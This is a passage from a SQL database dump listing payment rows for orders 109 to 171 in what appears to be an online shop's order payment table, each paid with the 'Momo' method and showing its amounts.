ULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(109,109,NULL,NULL,NULL,NULL,NULL,3336300.0000,NULL,NULL,0.0000,0.0000,NULL,3336300.0000,3336300.0000,NULL,NULL,NULL,3336300.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(110,110,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(111,111,NULL,NULL,NULL,NULL,NULL,7961625.0000,NULL,NULL,0.0000,0.0000,NULL,7961625.0000,7961625.0000,NULL,NULL,NULL,7961625.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(112,112,NULL,NULL,NULL,NULL,NULL,3336300.0000,NULL,NULL,0.0000,0.0000,NULL,3336300.0000,3336300.0000,NULL,NULL,NULL,3336300.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(113,113,NULL,NULL,NULL,NULL,NULL,12839700.0000,NULL,NULL,0.0000,0.0000,NULL,12839700.0000,12839700.0000,NULL,NULL,NULL,12839700.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(114,114,NULL,NULL,NULL,NULL,NULL,10211100.0000,NULL,NULL,0.0000,0.0000,NULL,10211100.0000,10211100.0000,NULL,NULL,NULL,10211100.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(115,115,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(116,116,NULL,NULL,NULL,NULL,NULL,7961625.0000,NULL,NULL,0.0000,0.0000,NULL,7961625.0000,7961625.0000,NULL,NULL,NULL,7961625.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(117,117,NULL,NULL,NULL,NULL,NULL,9402300.0000,NULL,NULL,0.0000,0.0000,NULL,9402300.0000,9402300.0000,NULL,NULL,NULL,9402300.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(118,118,NULL,NULL,NULL,NULL,NULL,4549500.0000,NULL,NULL,0.0000,0.0000,NULL,4549500.0000,4549500.0000,NULL,NULL,NULL,4549500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(119,119,NULL,NULL,NULL,NULL,NULL,23758500.0000,NULL,NULL,0.0000,0.0000,NULL,23758500.0000,23758500.0000,NULL,NULL,NULL,23758500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(120,120,NULL,NULL,NULL,NULL,NULL,23758500.0000,NULL,NULL,0.0000,0.0000,NULL,23758500.0000,23758500.0000,NULL,NULL,NULL,23758500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(121,121,NULL,NULL,NULL,NULL,NULL,34879500.0000,NULL,NULL,0.0000,0.0000,NULL,34879500.0000,34879500.0000,NULL,NULL,NULL,34879500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(122,122,NULL,NULL,NULL,NULL,NULL,13143000.0000,NULL,NULL,0.0000,0.0000,NULL,13143000.0000,13143000.0000,NULL,NULL,NULL,13143000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(123,123,NULL,NULL,NULL,NULL,NULL,98269200.0000,NULL,NULL,0.0000,0.0000,NULL,98269200.0000,98269200.0000,NULL,NULL,NULL,98269200.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(124,124,NULL,NULL,NULL,NULL,NULL,7961625.0000,NULL,NULL,0.0000,0.0000,NULL,7961625.0000,7961625.0000,NULL,NULL,NULL,7961625.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(125,125,NULL,NULL,NULL,NULL,NULL,10211100.0000,NULL,NULL,0.0000,0.0000,NULL,10211100.0000,10211100.0000,NULL,NULL,NULL,10211100.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(126,126,NULL,NULL,NULL,NULL,NULL,3336300.0000,NULL,NULL,0.0000,0.0000,NULL,3336300.0000,3336300.0000,NULL,NULL,NULL,3336300.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(127,127,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(128,128,NULL,NULL,NULL,NULL,NULL,17692500.0000,NULL,NULL,0.0000,0.0000,NULL,17692500.0000,17692500.0000,NULL,NULL,NULL,17692500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(129,129,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(130,130,NULL,NULL,NULL,NULL,NULL,8593500.0000,NULL,NULL,0.0000,0.0000,NULL,8593500.0000,8593500.0000,NULL,NULL,NULL,8593500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(131,131,NULL,NULL,NULL,NULL,NULL,176925000.0000,NULL,NULL,0.0000,0.0000,NULL,176925000.0000,176925000.0000,NULL,NULL,NULL,176925000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(132,132,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(133,133,NULL,NULL,NULL,NULL,NULL,17692500.0000,NULL,NULL,0.0000,0.0000,NULL,17692500.0000,17692500.0000,NULL,NULL,NULL,17692500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(134,134,NULL,NULL,NULL,NULL,NULL,8593500.0000,NULL,NULL,0.0000,0.0000,NULL,8593500.0000,8593500.0000,NULL,NULL,NULL,8593500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(135,135,NULL,NULL,NULL,NULL,NULL,176925000.0000,NULL,NULL,0.0000,0.0000,NULL,176925000.0000,176925000.0000,NULL,NULL,NULL,176925000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(136,136,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(137,137,NULL,NULL,NULL,NULL,NULL,17692500.0000,NULL,NULL,0.0000,0.0000,NULL,17692500.0000,17692500.0000,NULL,NULL,NULL,17692500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(138,138,NULL,NULL,NULL,NULL,NULL,8593500.0000,NULL,NULL,0.0000,0.0000,NULL,8593500.0000,8593500.0000,NULL,NULL,NULL,8593500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(139,139,NULL,NULL,NULL,NULL,NULL,176925000.0000,NULL,NULL,0.0000,0.0000,NULL,176925000.0000,176925000.0000,NULL,NULL,NULL,176925000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(140,140,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(141,141,NULL,NULL,NULL,NULL,NULL,17692500.0000,NULL,NULL,0.0000,0.0000,NULL,17692500.0000,17692500.0000,NULL,NULL,NULL,17692500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(142,142,NULL,NULL,NULL,NULL,NULL,8593500.0000,NULL,NULL,0.0000,0.0000,NULL,8593500.0000,8593500.0000,NULL,NULL,NULL,8593500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(143,143,NULL,NULL,NULL,NULL,NULL,176925000.0000,NULL,NULL,0.0000,0.0000,NULL,176925000.0000,176925000.0000,NULL,NULL,NULL,176925000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(144,144,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(145,145,NULL,NULL,NULL,NULL,NULL,17692500.0000,NULL,NULL,0.0000,0.0000,NULL,17692500.0000,17692500.0000,NULL,NULL,NULL,17692500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(146,146,NULL,NULL,NULL,NULL,NULL,8593500.0000,NULL,NULL,0.0000,0.0000,NULL,8593500.0000,8593500.0000,NULL,NULL,NULL,8593500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(147,147,NULL,NULL,NULL,NULL,NULL,176925000.0000,NULL,NULL,0.0000,0.0000,NULL,176925000.0000,176925000.0000,NULL,NULL,NULL,176925000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(148,148,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(149,149,NULL,NULL,NULL,NULL,NULL,17692500.0000,NULL,NULL,0.0000,0.0000,NULL,17692500.0000,17692500.0000,NULL,NULL,NULL,17692500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(150,150,NULL,NULL,NULL,NULL,NULL,8593500.0000,NULL,NULL,0.0000,0.0000,NULL,8593500.0000,8593500.0000,NULL,NULL,NULL,8593500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(151,151,NULL,NULL,NULL,NULL,NULL,176925000.0000,NULL,NULL,0.0000,0.0000,NULL,176925000.0000,176925000.0000,NULL,NULL,NULL,176925000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(152,152,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(153,153,NULL,NULL,NULL,NULL,NULL,17692500.0000,NULL,NULL,0.0000,0.0000,NULL,17692500.0000,17692500.0000,NULL,NULL,NULL,17692500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(154,154,NULL,NULL,NULL,NULL,NULL,8593500.0000,NULL,NULL,0.0000,0.0000,NULL,8593500.0000,8593500.0000,NULL,NULL,NULL,8593500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(155,155,NULL,NULL,NULL,NULL,NULL,176925005.0000,NULL,NULL,5.0000,5.0000,NULL,176925005.0000,176925005.0000,NULL,NULL,NULL,176925005.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(156,156,NULL,NULL,NULL,NULL,NULL,9099005.0000,NULL,NULL,5.0000,5.0000,NULL,9099005.0000,9099005.0000,NULL,NULL,NULL,9099005.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(157,157,NULL,NULL,NULL,NULL,NULL,194617510.0000,NULL,NULL,10.0000,10.0000,NULL,194617510.0000,194617510.0000,NULL,NULL,NULL,194617510.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(158,158,NULL,NULL,NULL,NULL,NULL,194617510.0000,NULL,NULL,10.0000,10.0000,NULL,194617510.0000,194617510.0000,NULL,NULL,NULL,194617510.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(159,159,NULL,NULL,NULL,NULL,NULL,194617500.0000,NULL,NULL,0.0000,0.0000,NULL,194617500.0000,194617500.0000,NULL,NULL,NULL,194617500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(160,160,NULL,NULL,NULL,NULL,NULL,176925005.0000,NULL,NULL,5.0000,5.0000,NULL,176925005.0000,176925005.0000,NULL,NULL,NULL,176925005.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(161,161,NULL,NULL,NULL,NULL,NULL,8593500.0000,NULL,NULL,0.0000,0.0000,NULL,8593500.0000,8593500.0000,NULL,NULL,NULL,8593500.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(162,162,NULL,NULL,NULL,NULL,NULL,41451015.0000,NULL,NULL,15.0000,15.0000,NULL,41451015.0000,41451015.0000,NULL,NULL,NULL,41451015.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(163,163,NULL,NULL,NULL,NULL,NULL,23758505.0000,NULL,NULL,5.0000,5.0000,NULL,23758505.0000,23758505.0000,NULL,NULL,NULL,23758505.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(164,164,NULL,NULL,NULL,NULL,NULL,17692510.0000,NULL,NULL,10.0000,10.0000,NULL,17692510.0000,17692510.0000,NULL,NULL,NULL,17692510.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(165,165,NULL,NULL,NULL,NULL,NULL,36598200.0000,NULL,NULL,0.0000,0.0000,NULL,36598200.0000,36598200.0000,NULL,NULL,NULL,36598200.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(166,166,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(167,167,NULL,NULL,NULL,NULL,NULL,2.0000,NULL,NULL,0.0000,0.0000,NULL,2.0000,2.0000,NULL,NULL,NULL,2.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(168,168,NULL,NULL,NULL,NULL,NULL,2.0000,NULL,NULL,0.0000,0.0000,NULL,2.0000,2.0000,NULL,NULL,NULL,2.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(169,169,NULL,NULL,NULL,NULL,NULL,1627710.0000,NULL,NULL,0.0000,0.0000,NULL,1627710.0000,1627710.0000,NULL,NULL,NULL,1627710.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(170,170,NULL,NULL,NULL,NULL,NULL,202200.0000,NULL,NULL,0.0000,0.0000,NULL,202200.0000,202200.0000,NULL,NULL,NULL,202200.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(171,171,NULL,NULL,NULL,NULL,NULL,101100.0000,NULL,NULL,0.0000,0.0000,N